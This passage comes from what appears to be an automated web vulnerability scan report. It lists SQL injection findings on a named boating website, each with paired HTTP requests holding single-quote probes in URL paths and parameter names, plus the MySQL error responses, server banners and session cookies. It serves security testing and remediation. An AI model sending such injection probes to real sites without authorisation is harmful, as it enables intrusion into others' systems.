The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.77. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/yvcomment'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/yvcomment''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.78. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/yvcomment/?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/yvcomment/?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.79. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /contact-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /contact-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.80. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.81. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/destinations?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/destinations?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.82. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/in-depth?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/in-depth?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.83. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/justyesterday?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/justyesterday?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.84. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/lifestyle?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/lifestyle?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.85. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/profiles?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
